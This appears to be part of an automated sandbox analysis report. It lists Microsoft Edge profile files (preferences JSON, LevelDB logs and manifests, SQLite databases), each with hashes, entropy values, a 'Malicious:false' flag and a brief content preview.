                                                                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (17761), with no line terminators
                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                    Size (bytes):17767
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.487842744686574
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:stVPGKSu4SswffhluMfmSRbGJQwO6WgJlaTYX:sbOxutffmqbGap8naTYX
                                                                                                                                                                                                                                                                                                                                    MD5:827337F92DE11C75A5E35DF1D7DDE799
                                                                                                                                                                                                                                                                                                                                    SHA1:6777A10AEDC8DD0A3B7139B12527E032726EBCB5
                                                                                                                                                                                                                                                                                                                                    SHA-256:88721C3CA78817EAD5E0C854D10A60A6C2045DE472B5ED34CDB92FC6049D0D34
                                                                                                                                                                                                                                                                                                                                    SHA-512:E7804F75AB85A8332EB832A4B735928B64B1329ADC5346EF71D71C5774D1C23165EDE6316C7BC36EE69B06CA490D1D0B84E8FE9A66872640353632F253C532C5
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380108386242373","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):13853
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.239503772870446
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:stVJ99QTryDigabatSuypSswfsZihUkA6OYGFiN8bbV+F0sQwj66W9aFIMYLPiYJ:stVPGKSu4SswffhAbGJQwO6W9aTYX
                                                                                                                                                                                                                                                                                                                                    MD5:FF16F73C270C2BEED3545B32AF911E92
                                                                                                                                                                                                                                                                                                                                    SHA1:0E1B009F0B4BCAAD462DFC2FFAA0674A5DEE673B
                                                                                                                                                                                                                                                                                                                                    SHA-256:E3E0F1E1CAAC5CAB9A06AB03CEBF970B3EC41D2604B127B184F464A651F21B6A
                                                                                                                                                                                                                                                                                                                                    SHA-512:A2AB52225ACB3D998DAF613FD24B9E5F9BAD626A4D9EB9A0A87D786BC5BCC0C85C84758EA8537CDEB43395240864D22813778CB7863ECD4CAA78C0EAABE66E23
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380108386242373","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                                                    MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                                                    SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                                                    SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                                                    SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):309
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.23812983462278
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56fbc5ERM1923oH+Tcwtp3hBtB2KLlr6fVGcq2P923oH+Tcwtp3hBWsIFUv:ofbcaRhYebp3dFLQfVGcv4Yebp3eFUv
                                                                                                                                                                                                                                                                                                                                    MD5:77A4B7A48F884FC163EA7A19099802E9
                                                                                                                                                                                                                                                                                                                                    SHA1:71B427B61B9C80069D0F775252480B4ABEEA1409
                                                                                                                                                                                                                                                                                                                                    SHA-256:7DFE70D51467AF386018C36AC660FBF3AC20A2D3963D768855B480CF07BC075B
                                                                                                                                                                                                                                                                                                                                    SHA-512:5DF6BDBCEBCBEDC6D1D80C6A84CD9F5A8B2B9DCD4431B00E984FB1CF21CC983FAEDEA678F4B26034700BA93949A6482813BE8A8431A09B7E83FF6045DC9F63B2
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:31.591 1c24 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/31-03:46:31.623 1c24 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2163821
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.222859166372643
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:v+/PN8F5fI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN83fx2mjF
                                                                                                                                                                                                                                                                                                                                    MD5:CD104E14FD35EEA8EF2B03D60C2AADE6
                                                                                                                                                                                                                                                                                                                                    SHA1:C0E76FFB92AE88C7720ED2BEBD14A89A80898EA6
                                                                                                                                                                                                                                                                                                                                    SHA-256:3BB69A609AA8B43591F5AE18A9F6595330E174A991D40703E048E178AC6338EA
                                                                                                                                                                                                                                                                                                                                    SHA-512:80BA92C1CCFDBE9049471E6213659282F0A7B304FD8BF11C4954F32DCE44E5566452DD16A274D349E1A08EC6B79255FAE988BC9F9D8B152985F69B9F74FB4E03
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1179037462052515
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56fX7u6q2P923oH+Tcwt9Eh1tIFUt8M6fXiiZmw+M6fXSWkwO923oH+Tcwt9Eh1H:ofr5v4Yeb9Eh16FUt8xfSi/+xf55LYe8
                                                                                                                                                                                                                                                                                                                                    MD5:1F18862851772569FBD543AAC9F87C1A
                                                                                                                                                                                                                                                                                                                                    SHA1:08C028D403ED24365A57CF853BD2A011AACC31FE
                                                                                                                                                                                                                                                                                                                                    SHA-256:D9F44C6882C9A5651A699E6029796819BB8B4107EBD8694F4EDA734703947BA6
                                                                                                                                                                                                                                                                                                                                    SHA-512:A894B0B5D7C0CA2F2EDE538A6998EFC29577572F93EBEA032767696D3D42E1F28AD5AE9F50223EF32AE90D4021523994EE6B20B8DD569F08EB0A8AA2AC4D6643
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:31.448 1cc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/31-03:46:31.449 1cc0 Recovering log #3.2024/12/31-03:46:31.456 1cc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1179037462052515
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56fX7u6q2P923oH+Tcwt9Eh1tIFUt8M6fXiiZmw+M6fXSWkwO923oH+Tcwt9Eh1H:ofr5v4Yeb9Eh16FUt8xfSi/+xf55LYe8
                                                                                                                                                                                                                                                                                                                                    MD5:1F18862851772569FBD543AAC9F87C1A
                                                                                                                                                                                                                                                                                                                                    SHA1:08C028D403ED24365A57CF853BD2A011AACC31FE
                                                                                                                                                                                                                                                                                                                                    SHA-256:D9F44C6882C9A5651A699E6029796819BB8B4107EBD8694F4EDA734703947BA6
                                                                                                                                                                                                                                                                                                                                    SHA-512:A894B0B5D7C0CA2F2EDE538A6998EFC29577572F93EBEA032767696D3D42E1F28AD5AE9F50223EF32AE90D4021523994EE6B20B8DD569F08EB0A8AA2AC4D6643
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:31.448 1cc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/31-03:46:31.449 1cc0 Recovering log #3.2024/12/31-03:46:31.456 1cc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.46280544021969133
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuIM:TouQq3qh7z3bY2LNW9WMcUvBuIM
                                                                                                                                                                                                                                                                                                                                    MD5:D934D7A71D677CA87A76301F8FE8FA53
                                                                                                                                                                                                                                                                                                                                    SHA1:56AF56511CE6CC543C02C4FE204C1BEB9E552FAB
                                                                                                                                                                                                                                                                                                                                    SHA-256:0BCB92AC266541ACF0EC5035AB73D89CF21504422C76579098C28FB72A3DD711
                                                                                                                                                                                                                                                                                                                                    SHA-512:D105DF0C2B710423C400A074A736211373D7914E77D52CB5AA4FF2FC368D2AF4895D062891A62AE1CDB2CD0945DF3737E2AAB8B967DC1D04221F4856D10842CB
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                                                    MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                                                    SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                                                    SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                                                    SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):345
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.20933325706642
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9etKAVq2P923oH+TcwtnG2tMsIFUt8M6f9etKAgZmw+M6f9eGIkwO923oH+TR:ofY04v4Yebn9GFUt8xfY0J/+xfYx5LYi
                                                                                                                                                                                                                                                                                                                                    MD5:BD95057E05BB1A519BE66FB477D5146A
                                                                                                                                                                                                                                                                                                                                    SHA1:8B645CDF0B031D14E60BA10990B6BD1034C10113
                                                                                                                                                                                                                                                                                                                                    SHA-256:B4B35A211FD48117C5041264E56BBC85F142778EFB79FF5C27D201A4A8A3DDDA
                                                                                                                                                                                                                                                                                                                                    SHA-512:92047E8575C3F618782005D13EE7611B0C62BF44A9120A3988E2696A1D2810959E1E8EA408EC8A3A10C10283A58C92EA42EDA8CFD57BF71EF8D35780F058BE88
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:25.846 fa0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/31-03:46:25.846 fa0 Recovering log #3.2024/12/31-03:46:25.847 fa0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):345
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.20933325706642
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9etKAVq2P923oH+TcwtnG2tMsIFUt8M6f9etKAgZmw+M6f9eGIkwO923oH+TR:ofY04v4Yebn9GFUt8xfY0J/+xfYx5LYi
                                                                                                                                                                                                                                                                                                                                    MD5:BD95057E05BB1A519BE66FB477D5146A
                                                                                                                                                                                                                                                                                                                                    SHA1:8B645CDF0B031D14E60BA10990B6BD1034C10113
                                                                                                                                                                                                                                                                                                                                    SHA-256:B4B35A211FD48117C5041264E56BBC85F142778EFB79FF5C27D201A4A8A3DDDA
                                                                                                                                                                                                                                                                                                                                    SHA-512:92047E8575C3F618782005D13EE7611B0C62BF44A9120A3988E2696A1D2810959E1E8EA408EC8A3A10C10283A58C92EA42EDA8CFD57BF71EF8D35780F058BE88
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:25.846 fa0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/31-03:46:25.846 fa0 Recovering log #3.2024/12/31-03:46:25.847 fa0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6143078261181434
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jE+cpo7BmL:TO8D4jJ/6Up+I4G
                                                                                                                                                                                                                                                                                                                                    MD5:D5DFCB7458C5A3237D61D7BD9154811F
                                                                                                                                                                                                                                                                                                                                    SHA1:056C71B0419C11F4B5D961D793F8DBBCDD337AEE
                                                                                                                                                                                                                                                                                                                                    SHA-256:51137C12425DE9A48338A5F9E5677D1388AC6F2F75B3D5E05892AD386285F7C7
                                                                                                                                                                                                                                                                                                                                    SHA-512:45D6B79C2B8520FB4CE3F7E4A2B1784AE371C59B6D8DCB0D443A13E5F67E26CBF64BCE7D4BDC394CEEF4A6763C4C6EB5F7D1A73021E3A5DB58B82E8B23E21E74
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):375520
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.354116181544619
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:pA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:pFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                                    MD5:C2D44B7A5A11C92D576831FF5D8AFBD6
